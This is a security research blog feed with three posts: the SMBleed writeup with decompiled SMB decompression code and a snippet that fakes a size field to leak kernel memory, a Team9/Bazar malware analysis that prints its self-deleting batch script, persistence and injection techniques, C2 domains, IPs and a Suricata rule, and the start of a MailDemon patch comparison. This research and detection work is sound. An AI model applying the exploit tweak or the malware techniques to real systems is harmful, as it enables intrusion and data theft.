Normal view

There are new articles available, click to refresh the page.
Before yesterdayVulnerabily Research

SMBleedingGhost Writeup: Chaining SMBleed (CVE-2020-1206) with SMBGhost

9 June 2020 at 17:40
SMBleedingGhost Writeup: Chaining SMBleed (CVE-2020-1206) with SMBGhost

TL;DR

  • While looking at the vulnerable function of SMBGhost, we discovered another vulnerability: SMBleed (CVE-2020-1206).
  • SMBleed allows to leak kernel memory remotely.
  • Combined with SMBGhost, which was patched three months ago, SMBleed allows to achieve pre-auth Remote Code Execution (RCE).
  • POC #1: SMBleed remote kernel memory read: POC #1 Link
  • POC #2: Pre-Auth RCE Combining SMBleed with SMBGhost: POC #2 Link

Introduction

The SMBGhost (CVE-2020-0796) bug in the compression mechanism of SMBv3.1.1 was fixed about three months ago. In our previous writeup we explained the bug, and demonstrated a way to exploit it for local privilege escalation. As we found during our research, it’s not the only bug in the SMB decompression functionality. SMBleed happens in the same function as SMBGhost. The bug allows an attacker to read uninitialized kernel memory, as we illustrated in detail in this writeup.

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team

Your subscription request to ZecOps Blog has been successfully sent.
We won’t spam, pinky swear 🤞

An observation

The bug happens in the same function as with SMBGhost, the Srv2DecompressData function in the srv2.sys SMB server driver.  Below is a simplified version of the function, with the irrelevant details omitted:

typedef struct _COMPRESSION_TRANSFORM_HEADER
{
    ULONG ProtocolId;
    ULONG OriginalCompressedSegmentSize;
    USHORT CompressionAlgorithm;
    USHORT Flags;
    ULONG Offset;
} COMPRESSION_TRANSFORM_HEADER, *PCOMPRESSION_TRANSFORM_HEADER;


typedef struct _ALLOCATION_HEADER
{
    // ...
    PVOID UserBuffer;
    // ...
} ALLOCATION_HEADER, *PALLOCATION_HEADER;


NTSTATUS Srv2DecompressData(PCOMPRESSION_TRANSFORM_HEADER Header, SIZE_T TotalSize)
{
    PALLOCATION_HEADER Alloc = SrvNetAllocateBuffer(
        (ULONG)(Header->OriginalCompressedSegmentSize + Header->Offset),
        NULL);
    If (!Alloc) {
        return STATUS_INSUFFICIENT_RESOURCES;
    }


    ULONG FinalCompressedSize = 0;


    NTSTATUS Status = SmbCompressionDecompress(
        Header->CompressionAlgorithm,
        (PUCHAR)Header + sizeof(COMPRESSION_TRANSFORM_HEADER) + Header->Offset,
        (ULONG)(TotalSize - sizeof(COMPRESSION_TRANSFORM_HEADER) - Header->Offset),
        (PUCHAR)Alloc->UserBuffer + Header->Offset,
        Header->OriginalCompressedSegmentSize,
        &FinalCompressedSize);
    if (Status < 0 || FinalCompressedSize != Header->OriginalCompressedSegmentSize) {
        SrvNetFreeBuffer(Alloc);
        return STATUS_BAD_DATA;
    }


    if (Header->Offset > 0) {
        memcpy(
            Alloc->UserBuffer,
            (PUCHAR)Header + sizeof(COMPRESSION_TRANSFORM_HEADER),
            Header->Offset);
    }


    Srv2ReplaceReceiveBuffer(some_session_handle, Alloc);
    return STATUS_SUCCESS;
}

The Srv2DecompressData function receives the compressed message which is sent by the client, allocates the required amount of memory, and decompresses the data. Then, if the Offset field is not zero, it copies the data that is placed before the compressed data as is to the beginning of the allocated buffer.

The SMBGhost bug happened due to lack of integer overflow checks. It was fixed by Microsoft and even though we didn’t add it to our function to keep it simple, this time we will assume that the function checks for integer overflows and discards the message in these cases. Even with these checks in place, there’s still a serious bug. Can you spot it?

Faking OriginalCompressedSegmentSize again

Previously, we exploited SMBGhost by setting the OriginalCompressedSegmentSize field to be a huge number, causing an integer overflow followed by an out of bounds write. What if we set it to be a number which is just a little bit larger than the actual decompressed data we send? For example, if the size of our compressed data is x after decompression, and we set OriginalCompressedSegmentSize to be x + 0x1000, we’ll get the following:

The uninitialized kernel data is going to be treated as a part of our message.

If you didn’t read our previous writeup, you might think that the Srv2DecompressData function call should fail due to the check that follows the SmbCompressionDecompress call:

if (Status < 0 || FinalCompressedSize != Header->OriginalCompressedSegmentSize) {
    SrvNetFreeBuffer(Alloc);
    return STATUS_BAD_DATA;
}

Specifically, in our example, you might assume that while the value of the OriginalCompressedSegmentSize field is x + 0x1000, FinalCompressedSize will be set to x in this case. In fact, FinalCompressedSize will be set to x + 0x1000 as well due to the implementation of the SmbCompressionDecompress function:

NTSTATUS SmbCompressionDecompress(
    USHORT CompressionAlgorithm,
    PUCHAR UncompressedBuffer,
    ULONG  UncompressedBufferSize,
    PUCHAR CompressedBuffer,
    ULONG  CompressedBufferSize,
    PULONG FinalCompressedSize)
{
    // ...

    NTSTATUS Status = RtlDecompressBufferEx2(
        ...,
        FinalUncompressedSize,
        ...);
    if (status >= 0) {
        *FinalCompressedSize = CompressedBufferSize;
    }

    // ...

    return Status;
}

In case of a successful decompression, FinalCompressedSize is updated to hold the value of CompressedBufferSize, which is the size of the buffer. Not only this seemingly unnecessary, deliberate update of the FinalCompressedSize value made the exploitation of SMBGhost easier, it also allowed the SMBleed bug to exist.

Basic exploitation

The SMB message we used to demonstrate the vulnerability is the SMB2 WRITE message. The message structure contains fields such as the amount of bytes to write and flags, followed by a variable length buffer. That’s perfect for exploiting the bug, since we can craft a message such that we specify the header, but the variable length buffer contains uninitialized data. We based our POC on Microsoft’s WindowsProtocolTestSuites repository (that we also used for the first SMBGhost reproduction), introducing this small addition to the compression function:

// HACK: fake size
if (((Smb2SinglePacket)packet).Header.Command == Smb2Command.WRITE)
{
    ((Smb2WriteRequestPacket)packet).PayLoad.Length += 0x1000;
    compressedPacket.Header.OriginalCompressedSegmentSize += 0x1000;
}

Note that our POC requires credentials and a writable share, which are available in many scenarios, but the bug applies to every message, so it can potentially be exploited without authentication. Also note that the leaked memory is from previous allocations in the NonPagedPoolNx pool, and since we control the allocation size, we might be able to control the data that is being leaked to some degree.

SMBleed POC Source Code

Affected Windows versions

Windows 10 versions 1903, 1909 and 2004 are affected. During testing, our POC crashed one of our Windows 10 1903 machines. After analyzing the crash with Neutrino we saw that the earliest, unpatched versions of Windows 10 1903 have a null pointer dereference bug while handling valid, compressed SMB packets. Please note, we didn’t investigate further to find whether it’s possible to bypass the null pointer dereference bug and exploit the system.

An unpatched system, null pointer dereference happens here.
A patched system, the added null pointer check.

Here’s a summary of the affected Windows versions with the relevant updates installed:

Windows 10 Version 2004

Update SMBGhost SMBleed
KB4557957 Not Vulnerable Not Vulnerable
Before KB4557957 Not Vulnerable Vulnerable

Windows 10 Version 1909

Update SMBGhost SMBleed
KB4560960 Not Vulnerable Not Vulnerable
KB4551762 Not Vulnerable Vulnerable
Before KB4551762 Vulnerable Vulnerable

Windows 10 Version 1903

Update Null Dereference Bug SMBGhost SMBleed
KB4560960 Fixed Not Vulnerable Not Vulnerable
KB4551762 Fixed Not Vulnerable Vulnerable
KB4512941 Fixed Vulnerable Vulnerable
None of the above Not Fixed Vulnerable Potentially vulnerable*

* We haven’t tried to bypass the null dereference bug, but it may be possible through another method (for example, using SMBGhost Write-What-Where primitive)

SMBleedingGhost? Chaining SMBleed with SMBGhost for pre-auth RCE

Exploiting the SMBleed bug without authentication is less straightforward, but also possible. We were able to use it together with the SMBGhost bug to achieve RCE (Remote Code Execution). A writeup with the technical details will be published soon. For now, please see below a POC demonstrating the exploitation. This POC is released only for educational and research purposes, as well as for  evaluation of security defenses. Use at your own risk. ZecOps takes no responsibility for any misuse of this POC. 

SMBGhost + SMBleed RCE POC Source Code

Detection

ZecOps Neutrino customers detect exploitation of SMBleed & SMBGhost – no further action is required. SMBleed & SMBGhost can be detected in multiple ways, including crash dump analysis, a network traffic analysis. Signatures are available to ZecOps Threat Intelligence subscribers. Feel free to reach out to us at [email protected] for more information.

Remediation

You can remediate both SMBleed and SMBGhost by doing one or more of the following things:

  1. Windows update will solve the issues completely (recommended)
  2. Blocking port 445 will stop lateral movements using these vulnerabilities
  3. Enforcing host isolation
  4. Disabling SMB 3.1.1 compression (not a recommended solution)

Shout out to Chompie that exploited this bug with a different technique. Chompie’s POC is available here.

In-depth analysis of the new Team9 malware family

2 June 2020 at 14:00

Author: Nikolaos Pantazopoulos
Co-author: Stefano Antenucci (@Antelox)
And in close collaboration with NCC’s RIFT.

1. Introduction

Publicly discovered in late April 2020, the Team9 malware family (also known as ‘Bazar [1]’) appears to be a new malware being developed by the group behind Trickbot. Even though the development of the malware appears to be recent, the developers have already developed two components with rich functionality. The purpose of this blog post is to describe the functionality of the two components, the loader and the backdoor.

About the Research and Intelligence Fusion Team (RIFT):

RIFT leverages our strategic analysis, data science, and threat hunting capabilities to create actionable threat intelligence, ranging from IOCs and detection rules to strategic reports on tomorrow’s threat landscape. Cyber security is an arms race where both attackers and defenders continually update and improve their tools and ways of working. To ensure that our managed services remain effective against the latest threats, NCC Group operates a Global Fusion Center with Fox-IT at its core. This multidisciplinary team converts our leading cyber threat intelligence into powerful detection strategies.

2. Early variant of Team9 loader

We assess that this is an earlier variant of the Team9 loader (35B3FE2331A4A7D83D203E75ECE5189B7D6D06AF4ABAC8906348C0720B6278A4) because of its simplicity and the compilation timestamp. The other variant was compiled more recently and has additional functionality. It should be noted that in very early versions of the loader binaries (2342C736572AB7448EF8DA2540CDBF0BAE72625E41DAB8FFF58866413854CA5C), the developers were using the Windows BITS functionality in order to download the backdoor. However, we believe that this functionality has been dropped.

Before proceeding to the technical analysis part, it is worth mentioning that the strings are not encrypted. Similarly, the majority of the Windows API functions are not loaded dynamically.

When the loader starts its execution, it checks if another instance of itself has infected the host already by attempting to read the value ‘BackUp Mgr’ in the ‘Run’ registry key ‘Software\Microsoft\Windows\CurrentVersion\Run’ (Figure 1). If it exists, it validates if the current loaders file path is the same as the one that has already been set in the registry value’s data (BackUp Mgr). Assuming that all of the above checks were successful, the loader proceeds to its core functionality.

figure1

Figure 1 – Loader verifies if it has already infect the host

However, if any of the above checks do not meet the requirements then the loader does one of the following actions:

  1. Copy itself to the %APPDATA%\Microsoft folder, add this file path in the registry ‘Run’ key under the value ‘BackUp Mgr’ and then execute the loader from the copied location.
  2. If the loader cannot access the %APPDATA% location or if the loader is running from this location already, then it adds the current file path in the ‘Run’ registry key under the value ‘BackUp Mgr’ and executes the loader again from this location.

When the persistence operation finishes, the loader deletes itself by writing a batch file in the Windows temporary folder with the file name prefix ‘tmp’ followed by random digits. The batch file content:

@echo off
set Module=%1
:Repeat
del %Module%
if exist %Module% goto Repeat
del %0

Next, the loader fingerprints the Windows architecture. This is a crucial step because the loader needs to know what version of the backdoor to download (32-bit or 64-bit). Once the Windows architecture has been identified, the loader carries out the download.

The core functionality of the loader is to download the Team9 backdoor component. The loader contains two ‘.bazar’ top-level domains which point to the Team9 backdoor. Each domain hosts two versions of the Team9 backdoor on different URIs, one for each Windows architecture (32-bit and 64-bit), the use of two domains is highly likely to be a backup method.

Any received files from the command and control server are sent in an encrypted format. In order to decrypt a file, the loader uses a bitwise XOR decryption with the key being based on the infected host’s system time (Year/Month/Day) (Figure 2).

figure2

Figure 2 – Generate XOR key based on infected host’s time

As a last step, the loader verifies that the executable file was decrypted successfully by validating the PE headers. If the Windows architecture is 32-bit, the loader injects the received executable file into ‘calc.exe’ (Windows calculator) using the ‘Process Hollowing’ technique. Otherwise, it writes the executable file to disk and executes it.

The following tables summarises the identified bazar domains and their URIs found in the early variants of the loader.

URI Description
/api/v108 Possibly downloads the 64-bit version of the Team9 backdoor
/api/v107 Possibly downloads the 32-bit version of the Team9 backdoor
/api/v5 Possibly downloads an updated 32-bit version of the Team9 loader
/api/v6 Possibly downloads an updated 64-bit version of the Team9 loader
/api/v7 Possibly downloads the 32-bit version of the Team9 backdoor
/api/v8 Possibly downloads the 64-bit version of the Team9 backdoor

Table 1 – Bazar URIs found in early variants of the loader

The table below (table 2) summarises the identified domains found in the early variants of the loader.

Bazar domains
bestgame[.]bazar
forgame[.]bazar
zirabuo[.]bazar
tallcareful[.]bazar
coastdeny[.]bazar

Table 2 – Bazar domains found in early variants of the loader

Lastly, another interesting observation is the log functionality in the binary file that reveals the following project file path:

d:\\development\\team9\\team9_restart_loader\\team9_restart_loader

3. Latest variant of Team9 loader

In this section, we describe the functionality of a second loader that we believe to be the latest variant of the aforementioned Team9 loader. This assessment is based on three factors:

  1. Similar URIs in the backdoor requests
  2. Similar payload decryption technique
  3. Similar code blocks

Unlike its previous version, the strings are encrypted and the majority of Windows API functions are loaded dynamically by using the Windows API hashing technique.

Once executed, the loader uses a timer in order to delay the execution. This is likely used as an anti-sandbox method. After the delayed time has passed, the loader starts executing its core functionality.

Before the malware starts interacting with the command and control server, it ensures that any other related files produced by a previous instance of the loader will not cause any issues. As a result the loader appends the string ‘_lyrt’ to its current file path and deletes any file with this name. Next, the loader searches for the parameter ‘-p’ in the command line and if found, it deletes the scheduled task ‘StartDT’. The loader creates this scheduled task later for persistence during execution. The loader also attempts to execute hijacked shortcut files, which will eventually execute an instance of Team9 loader. This functionality is described later.

The loader performs a last check to ensure that the operating systems keyboard and language settings are not set to Russian and creates a mutex with a hardcoded name ‘ld_201127’. The latter is to avoid double execution of its own instance.

As mentioned previously, the majority of Windows API functions are loaded dynamically. However, in an attempt to bypass any API hooks set by security products, the loader manually loads ‘ntdll’ from disk, reads the opcodes from each API function and compares them with the ones in memory (Figure 3). If the opcodes are different, the loader assumes a hook has been applied and removes it. This applies only to 64-bit samples reviewed to date.

figure3

Figure 3 – Scan for hooks in Windows API functions

The next stage downloads from the command and control server either the backdoor or an updated version of the loader. It is interesting to note that there are minor differences in the loader’s execution based on the identified Windows architecture and if the ‘-p’ parameter has been passed into the command line.

Assuming that the ‘-p’ parameter has not been passed into the command line, the loader has two loops. One for 32-bit and the other for 64-bit, which download an updated version of the loader. The main difference between the two loops is that in case of a Windows x64 infection, there is no check of the loader’s version.

The download process is the same with the previous variant, the loader resolves the command and control server IP address using a hardcoded list of DNS servers and then downloads the corresponding file. An interesting addition, in the latest samples, is the use of an alternative command and control server IP address, in case the primary one fails. The alternative IP address is generated by applying a bitwise XOR operation to each byte of the resolved command and control IP address with the byte 0xFE. In addition, as a possible anti-behaviour method, the loader verifies that the command and control server IP address is not ‘127.0.0.1’. Both of these methods are also present in the latest Team9 backdoor variants.

As with the previous Team9 loader variant, the command and control server sends back the binary files in an encrypted format. The decryption process is similar with its previous variant but with a minor change in the XOR key generation, the character ‘3’ is added between each hex digit of the day format (Figure 4). For example:

332330332330330335331338 (ASCII format, host date: 2020-05-18)

figure4

Figure 4 – Add the character ‘3’ in the generated XOR key

If the ‘-p’ parameter has been passed into the command line, the loader proceeds to download the Team9 backdoor directly from the command and control server. One notable addition is the process injection (hollow process injection) when the backdoor has been successfully downloaded and decrypted. The loader injects the backdoor to one of the following processes:

  1. Svchost
  2. Explorer
  3. cmd

Whenever a binary file is successfully downloaded and properly decrypted, the loader adds or updates its persistence in the infected host. The persistence methods are available in table 3.

Persistence Method Persistence Method Description
Scheduled task The loader creates two scheduled tasks, one for the updated loader (if any) and one for the downloaded backdoor. The scheduled task names and timers are different.
Winlogon hijack Add the malware’s file path in the ‘Userinit’ registry value. As a result, whenever the user logs in the malware is also executed.
Shortcut in the Startup folder The loaders creates a shortcut, which points to the malware file, in the Startup folder. The name of the shortcut is ‘adobe’.
Hijack already existing shortcuts The loader searches for shortcut files in Desktop and its subfolders. If it finds one then it copies the malware into the shortcut’s target location with the application’s file name and appends the string ‘__’ at the end of the original binary file name. Furthermore, the loader creates a ‘.bin’ file which stores the file path, file location and parameters. The ‘.bin’ file structure can be found in the Appendix section. When this structure is filled in with all required information, It is encrypted with the XOR key 0x61.

Table 3 – Persistence methods loader

The following tables summarises the identified bazar domains and their URIs for this Team9 loader variant.

URI Description
/api/v117 Possibly downloads the 32-bit version of the Team9 loader
/api/v118 Possibly downloads the 64-bit version of the Team9 loader
/api/v119 Possibly downloads the 32-bit version of the Team9 backdoor
/api/v120 Possibly downloads the 64-bit version of the Team9 backdoor
/api/v85 Possibly downloads the 32-bit version of the Team9 loader
/api/v86 Possibly downloads the 64-bit version of the Team9 loader
/api/v87 Possibly downloads the 32-bit version of the Team9 backdoor
/api/v88 Possibly downloads the 64-bit version of the Team9 backdoor

Table 4 – Identified URIs for Team9 loader variant

Bazar domain
bestgame[.]bazar
forgame[.]bazar

Table 5 – Identified domains for Team9 loader variant

4. Team9 backdoor

We are confident that this is the backdoor which the loader installs onto the compromised host. In addition, we believe that the first variants of the Team9 backdoor started appearing in the wild in late March 2020. Each variant does not appear to have major changes and the core of the backdoor remains the same.

During analysis, we identified the following similarities between the backdoor and its loader:

  1. Creates a mutex with a hardcoded name in order to avoid multiple instances running at the same time (So far the mutex names which we have identified are ‘mn_185445’ and ‘{589b7a4a-3776-4e82-8e7d-435471a6c03c}’)
  2. Verifies that the keyboard and the operating system language is not Russian
  3. Use of Emercoin domains with a similarity in the domain name choice

Furthermore, the backdoor generates a unique ID for the infected host. The process that it follows is:

  1. Find the creation date of ‘C:\Windows’ (Windows FILETIME structure format). The result is then converted from a hex format to an ASCII representation. An example is shown in figures 5 (before conversion) and 6 (after conversion).
  2. Repeat the same process but for the folder ‘C:\Windows\System32’
  3. Append the second string to the first with a bullet point as a delimiter. For example, 01d3d1d8 b10c2916.01d3d1d8 b5b1e079
  4. Get the NETBIOS name and append it to the previous string from step 3 along with a bullet point as a delimiter. For example: 01d3d1d8 b10c2916.01d3d1d8 b5b1e079.DESKTOP-4123EEB.
  5. Read the volume serial number of C: drive and append it to the previous string. For example: 01d3d1d8 b10c2916.01d3d1d8 b5b1e079.DESKTOP-SKCF8VA.609fbbd5
  6. Hash the string from step 5 using the MD5 algorithm. The output hash is the bot ID.

Note: In a few samples, the above algorithm is different. The developers use hard-coded dates, the Windows directory file paths in a string format (‘C:\Windows’ and ‘C:\Windows\system32’) and the NETBIOS name. Based on the samples’ functionality, there are many indications that these binary files were created for debugging purposes.

figure5

Figure 5 – Before conversion

figure6

Figure 6 – After conversion

4.1 Network communication

The backdoor appears to support network communication over ports 80 (HTTP) and 443(HTTPS). In recent samples, a certificate is issued from the infected host for communication over HTTPS. Each request to the command and control server includes at least the following information:

  1. A URI path for requesting tasks (/2) or sending results (/3).
  2. Group ID. This is added in the ‘Cookie’ header.

Lastly, unlike the loader which decrypts received network replies from the command and control server using the host’s date as the key, the Team9 backdoor uses the bot ID as the key.

4.2 Bot commands

The backdoor supports a variety of commands. These are summarised in the table below.

Command ID Description Parameters
0 Set delay time for the command and control server requests
  • Time to delay the requests
1 Collect infected host information
  •  Memory buffer to fill in the collected data
10 Download file from an address and inject into a process using either hollowing process injection or Doppelgänging process injection
  • DWORD value that represents the corresponding execution method. This includes:
    • Process hollowing injection
    • Process Doppelgänging injection
    • Write the file into disk and execute it
  • Process mask – DWORD value that represents the process name to inject the payload. This can be one of the following:
    1. Explorer
    2. Cmd
    3. Calc (Not used in all variants)
    4. Svchost
    5. notepad
  • Address from which the file is downloaded
  • Command line
11 Download a DLL file and execute it
  • Timeout value
  • Address to download the DLL
  • Command line
  • Timeout time
12 Execute a batch file received from the command and control server
  • DWORD value to determine if the batch script is to be stored into a Windows pipe (run from memory) or in a file into disk
  • Timeout value.
  • Batch file content
13 Execute a PowerShell script received from the command and control server
  • DWORD value to determine if the PowerShell script is to be stored into a Windows pipe (run from memory) or in a file into disk
  • Timeout value.
  • PowerShell script content
14 Reports back to the command and control server and terminates any handled tasks None
15 Terminate a process
  • PID of the process to terminate
16 Upload a file to the command and control server. Note: Each variant of the backdoor has a set file size they can handle.
  • Path of the file to read and upload to the command and control server.
100 Remove itself None

Table 6 – Supported backdoor commands

Table 7 summarises the report structure of each command when it reports back (POST request) to the command and control server. Note: In a few samples, the backdoor reports the results to an additional IP address (185.64.106[.]73) If it cannot communicate with the Bazar domains.

Command ID/Description Command execution results structure
1/ Collect infected host information The POST request includes the following information:
  • Operating system information
  • Operating system architecture
  • NETBIOS name of the infected host
  • Username of the infected user
  • Backdoor’s file path
  • Infected host time zone
  • Processes list
  • Keyboard language
  • Antivirus name and installed applications
  • Infected host’s external IP
  • Shared drives
  • Shared drives in the domain
  • Trust domains
  • Infected host administrators
  • Domain admins
11/ Download a DLL file and execute it The POST request includes the following parameters:
  • Command execution errors (Passed in the parameter ‘err’)
  • Process identifier (Passed in the ‘pid’ parameter)
  • Command execution output (Passed in the parameter ‘stdout’, if any)
  • Additional information from the command execution (Passed in the parameter ‘msg’, if any)
12/ Execute a batch file received from the command and control server Same as the previous command (11/ Download a DLL file and execute it)
13/ Execute a PowerShell script received from the command and control server Same as the previous command (11/ Download a DLL file and execute it)
14/ Reports back to the command and control server and terminate any handled tasks POST request with the string ‘ok’
15/ Terminate a process Same as the previous command (11/ Download a DLL file and execute it)
16/ Upload a file to the command and control server No parameters. The file’s content is sent in a POST request.
100/ Remove itself POST request with the string ‘ok’ or ‘process termination error’

Table 7 – Report structure

5. Appendix

5.1 struct shortcut_bin

struct shortcut_bin 

{ 
BYTE junk_data[434];
BYTE file_path[520];
BYTE filepath_dir[520];
BYTE file_loader_parameters[1024];
};

5.2 IOCs

File hashes

Description SHA-256 Hash
Team9 backdoor (x64) 4F258184D5462F64C3A752EC25FB5C193352C34206022C0755E48774592B7707
Team9 backdoor (x64) B10DCEC77E00B1F9B1F2E8E327A536987CA84BCB6B0C7327C292F87ED603837D
Team9 backdoor (x64) 363B6E0BC8873A6A522FE9485C7D8B4CBCFFA1DA61787930341F94557487C5A8
Team9 backdoor (x64) F4A5FE23E21B6B7D63FA2D2C96A4BC4A34B40FD40A921B237A50A5976FE16001
Team9 backdoor (x64) A0D0CFA8BF0BC5B8F769D8B64EAB22D308B108DD8A4D59872946D69C3F8C58A5
Team9 backdoor (x64) 059519E03772D6EEEA9498625AE8B8B7CF2F01FC8179CA5D33D6BCF29D07C9F4
Team9 backdoor (x64) 0F94B77892F22D0A0E7095B985F30B5EDBE17AB5B8D41F798EF0C708709636F4
Team9 backdoor (x64) 2F0F0956628D7787C62F892E1BD9EDDA8B4C478CF8F1E65851052C7AD493DC28
Team9 backdoor (x64) 37D713860D529CBE4EAB958419FFD7EBB3DC53BB6909F8BD360ADAA84700FAF2
Team9 backdoor (x64) 3400A7DF9EC3DC8283D5AC7ACCB6935691E93FEDA066CC46C6C04D67F7F87B2B
Team9 backdoor (x64) 5974D938BC3BBFC69F68C979A6DC9C412970FC527500735385C33377AB30373A
Team9 backdoor (x64) C55F8979995DF82555D66F6B197B0FBCB8FE30B431FF9760DEAE6927A584B9E3
Team9 backdoor (x86) 94DCAA51E792D1FA266CAE508C2C62A2CA45B94E2FDFBCA7EA126B6CD7BC5B21
Team9 backdoor (x86) 4EE0857D475E67945AF2C5E04BE4DEC3D6D3EB7C78700F007A7FF6F8C14D4CB3
Team9 backdoor (x86) 8F552E9CA2BEDD90CE9935A665758D5DE2E86B6FDA32D98918534A8A5881F91A
Team9 backdoor (x86) AE7DAA7CE3188CCFE4069BA14C486631EEA9505B7A107A17DDEE29061B0EDE99
Team9 backdoor (x86) F3C6D7309F00CC7009BEA4BE6128F0AF2EA6B87AB7A687D14092F85CCD35C1F5
Team9 backdoor (x86) 6CBF7795618FB5472C5277000D1C1DE92B77724D77873B88AF3819E431251F00
Team9 backdoor (x86) B0B758E680E652144A78A7DDECC027D4868C1DC3D8D7D611EC4D3798358B0CE5
Team9 backdoor (x86) 959BA7923992386ABF2E27357164672F29AAC17DDD4EE1A8AD4C691A1C566568
Team9 backdoor (x86) 3FE61D87C9454554B0CE9101F95E18ABAD8AC6C62DCC88DC651DDFB20568E060
Team9 loader (x64) B3764EF42D526A1AE1A4C3B0FE198F35C6BC5C07D5F155D15060B94F8F6DC695
Team9 loader (x64) 210C51AAB6FC6C52326ECE9DBD3DDAB5F58E98432EF70C46936672C79542FBD0
Team9 loader (x64) 11B5ADAEFD04FFDACEB9539F95647B1F51AEC2117D71ECE061F15A2621F1ECE9
Team9 loader (x64) 534D60392E0202B24D3FDAF992F299EF1AF1FB5EFEF0096DD835FE5C4E30B0FA
Team9 loader (x64) 9D3A265688C1A098DD37FE77C139442A8EB02011DA81972CEDDC0CF4730F67CF
Team9 loader (x64) CE478FDBD03573076394AC0275F0F7027F44A62A306E378FE52BEB0658D0B273
Team9 loader (x64) 5A888D05804D06190F7FC408BEDE9DA0423678C8F6ECA37ECCE83791DE4DF83D
Team9 loader (x64) EB62AD35C613A73B0BD28C1779ACE80E2BA587A7F8DBFEC16CF5BF520CAA71EE
Team9 loader (x64) A76426E269A2DEFABCF7AEF9486FF521C6110B64952267CFE3B77039D1414A41
Team9 loader (x64) 65CDBDD03391744BE87AC8189E6CD105485AB754FED0B069A1378DCA3E819F28
Team9 loader (x64) 38C9C3800DEA2761B7FAEC078E4BBD2794B93A251513B3F683AE166D7F186D19
Team9 loader (x64) 8F8673E6C6353187DBB460088ADC3099C2F35AD868966B257AFA1DF782E48875
Team9 loader (x86) 35B3FE2331A4A7D83D203E75ECE5189B7D6D06AF4ABAC8906348C0720B6278A4
Team9 loader (x86) 65E44FC8527204E88E38AB320B3E82694D1548639565FDAEE53B7E0F963D3A92
Team9 loader (x86) F53509AF91159C3432C6FAF4B4BE2AE741A20ADA05406F9D4E9DDBD48C91EBF9
Team9 loader (x86) 73339C130BB0FAAD27C852F925AA1A487EADF45DF667DB543F913DB73080CD5D
Team9 loader (x86) 2342C736572AB7448EF8DA2540CDBF0BAE72625E41DAB8FFF58866413854CA5C
Team9 loader (x86) 079A99B696CC984375D7A3228232C44153A167C1936C604ED553AC7BE91DD982
Team9 loader (x86) 0D8AEACF4EBF227BA7412F8F057A8CDDC54021846092B635C8D674B2E28052C6
Team9 loader (x86) F83A815CE0457B50321706957C23CE8875318CFE5A6F983A0D0C580EBE359295
Team9 loader (x86) 3FA209CD62BACC0C2737A832E5F0D5FD1D874BE94A206A29B3A10FA60CEB187D
Team9 loader (x86) 05ABD7F33DE873E9630F9E4F02DBD0CBC16DD254F305FC8F636DAFBA02A549B3

Table 8 – File hashes

Identified Emercoin domains

Domains
newgame[.]bazar
thegame[.]bazar
portgame[.]bazar
workrepair[.]bazar
realfish[.]bazar
eventmoult[.]bazar
bestgame[.]bazar
forgame[.]bazar
Zirabuo[.]bazar

Table 9 – Identified Emercoin domains

Command and Control IPs

C&C IPs
34.222.222[.]126
71.191.52[.]192
77.213.120[.]90
179[.]43.134.164
185[.]65.202.62
220[.]32.32.128
34[.]222.222.126
51[.]81.113.26
71[.]191.52.192
77[.]213.120.90
85[.]204.116.58

Table 10 – Command and Control IPs

Identified DNS IPs

DNS IPs
51[.]254.25.115
193[.]183.98.66
91[.]217.137.37
87[.]98.175.85
185[.]121.177.177
169[.]239.202.202
198[.]251.90.143
5[.]132.191.104
111[.]67.20.8
163[.]53.248.170
142[.]4.204.111
142[.]4.205.47
158[.]69.239.167
104[.]37.195.178
192[.]99.85.244
158[.]69.160.164
46[.]28.207.199
31[.]171.251.118
81[.]2.241.148
82[.]141.39.32
50[.]3.82.215
46[.]101.70.183
5[.]45.97.127
130[.]255.78.223
144[.]76.133.38
139[.]59.208.246
172[.]104.136.243
45[.]71.112.70
163[.]172.185.51
5[.]135.183.146
51[.]255.48.78
188[.]165.200.156
147[.]135.185.78
92[.]222.97.145
51[.]255.211.146
159[.]89.249.249
104[.]238.186.189
139[.]59.23.241
94[.]177.171.127
45[.]63.124.65
212[.]24.98.54
178[.]17.170.179
185[.]208.208.141
82[.]196.9.45
146[.]185.176.36
89[.]35.39.64
89[.]18.27.167
77[.]73.68.161
185[.]117.154.144
176[.]126.70.119
139[.]99.96.146
217[.]12.210.54
185[.]164.136.225
192[.]52.166.110
63[.]231.92.27
66[.]70.211.246
96[.]47.228.108
45[.]32.160.206
128[.]52.130.209
35[.]196.105.24
172[.]98.193.42
162[.]248.241.94
107[.]172.42.186
167[.]99.153.82
138[.]197.25.214
69[.]164.196.21
94[.]247.43.254
94[.]16.114.254
151[.]80.222.79
176[.]9.37.132
192[.]71.245.208
195[.]10.195.195

Table 11 – Identified DNS IPs

Mutexes

Component Mutex name
Team9 backdoor mn_185445
Team9 backdoor {589b7a4a-3776-4e82-8e7d-435471a6c03c}
Team9 loader ld_201127

Table 12 – Mutex names Team9 components

Host IOCs

  1. Files ending with the string ‘_lyrt’
  2. Scheduled tasks with names ‘StartAT’ and ‘StartDT’
  3. Shortcut with file name ‘adobe’ in the Windows ‘StartUp’ folder
  4. Registry value name ‘BackUp Mgr’ in the ‘Run’ registry key

Network detection

alert dns $HOME_NET any -> any 53 (msg:”FOX-SRT – Suspicious – Team9 Emercoin DNS Query Observed”; dns_query; content:”.bazar”; nocase; dns_query; pcre:”/(newgame|thegame|portgame|workrepair|realfish|eventmoult|bestgame|forgame|zirabuo)\.bazar/i”; threshold:type limit, track by_src, count 1, seconds 3600; classtype:trojan-activity; metadata:created_at 2020-05-28; metadata:ids suricata; sid:21003029; rev:3;)

Source(s):

[1] https://www.bleepingcomputer.com/news/security/bazarbackdoor-trickbot-gang-s-new-stealthy-network-hacking-malware/

Hidden demons? MailDemon Patch Analysis: iOS 13.4.5 Beta vs. iOS 13.5

24 May 2020 at 08:30
Hidden demons? MailDemon Patch Analysis: iOS 13.4.5 Beta vs. iOS 13.5

Summary and TL;DR

Further to Apple’s patch of the MailDemon vulnerability (see our blog here), ZecOps Research Team has analyzed and compared the MailDemon patches of iOS 13.4.5 beta and iOS 13.5. 

Our analysis concluded  that the patches are different, and that iOS 13.4.5 beta patch was incomplete and could be still vulnerable under certain circumstances. 

Since the 13.4.5 beta patch was insufficient, Apple issued a complete patch utilising a different approach which fixed this issue completely on both iOS 13.5 and iOS 12.4.7 as a special security update for older devices. 

This may explain why it took about one month for a full patch to be released. 

iOS 13.4.5 beta patch

The following is the heap-overflow vulnerability patch on iOS 13.4.5 beta.  

The function  -[MFMutableData appendBytes:length:] raises an exception if  -[MFMutableData _mapMutableData] returns false.

